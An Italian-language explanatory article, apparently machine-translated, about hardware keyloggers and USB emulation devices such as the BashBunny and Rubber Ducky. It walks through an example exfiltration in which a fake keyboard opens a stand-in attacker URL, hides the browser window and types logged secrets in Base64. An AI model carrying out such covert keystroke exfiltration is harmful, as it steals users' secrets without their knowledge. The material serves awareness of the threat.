I normali logger USB che estrapolano i loro dati tramite Bluetooth o WiFi possono essere facilmente nascosti all'interno di una tastiera. I logger Bluetooth richiedono che l'attaccante entri nel raggio d'azione per scaricare i loro contenuti, ma un adattatore basato su WiFi preconfigurato con una chiave di rete non richiede nemmeno che l'attaccante sia presente per vincere. Può collegarlo e lasciarlo riposare per sempre. Tali keylogger sono disponibili in commercio da molti anni. Esistono anche implementazioni open source disponibili dal progetto Playset di NSA, che sono dispositivi progettati per emulare i dispositivi di spionaggio trovati nel catalogo ANT fuori legge e ora infetto della NSA. Ma ora ci sono nuove opzioni ancora più sofisticate.
BashBunny è un'implementazione hardware disponibile in commercio di un camaleonte USB che svolge questo tipo di attività; l'USB Rubber Ducky è semplicemente un Evil Keyboard Simulator. BashBunny funziona eseguendo un piccolo computer Linux che emula tastiere USB generiche, dispositivi di archiviazione di massa USB, porte seriali USB e / o adattatori di rete USB. I dispositivi emulati sfruttano i driver Windows firmati esistenti utilizzati dai chipset generici. Tali dispositivi possono esfiltrare i dati acquisiti tramite il PC vittima semplicemente emulando una tastiera USB e digitando le istruzioni per inviarlo altrove.
Ecco un esempio semplicistico di come potrebbero esfiltrare i dati attraverso il PC vittima. Immagina che il dispositivo USB nascosto contenga un data logger e registra i tuoi segreti per un giorno o due. (Il BashBunny non contiene un keylogger, ma riceve i dati dalla scansione del sistema host. Ovviamente può installare un keylogger, quindi raccogliere i dati in un secondo momento.) Quando è il momento di inviare i dati, genera messaggi USB che contengono sequenze di tasti, ma l'utente non le sta digitando. Colpendo <Windows>R , quindi digitando http://www.evilhax0rs.invalid/key_logger_dump_page.php *, può apparire una pagina per lo più vuota con una casella di input nascosta situata così in basso sullo schermo che è necessario scorrere le barre per trovarla. Ora, immagina la tastiera anomala che colpisce <Windows><Shift><Down-Arrow> per far scorrere completamente la finestra del browser dallo schermo, nascondendola dalla vista dell'utente. Successivamente, la falsa tastiera inizia a digitare tutte le sequenze di tasti registrate nella casella di immissione (codificata Base64, naturalmente) e quando si è terminato, quando si è terminato, si preme <Enter> . Infine, dopo che tutti i segreti hanno lasciato l'edificio, digita <Windows><Shift><Up-Arrow> per ripristinare il browser, quindi digita velocemente <Control>F4 per chiudere la scheda. Anche se l'utente ha notato che le finestre spuntano prima di scomparire, può accadere così velocemente che la vittima tipica non avrà la possibilità di capire cosa sta succedendo.
Come ho detto, questi sono prodotti disponibili in commercio e open source che puoi acquistare oggi; il codice sorgente per i dispositivi malvagi e gli "script ducky" che eseguono la scrittura fantasma sono tutti ospitati su github.
* non una pagina reale.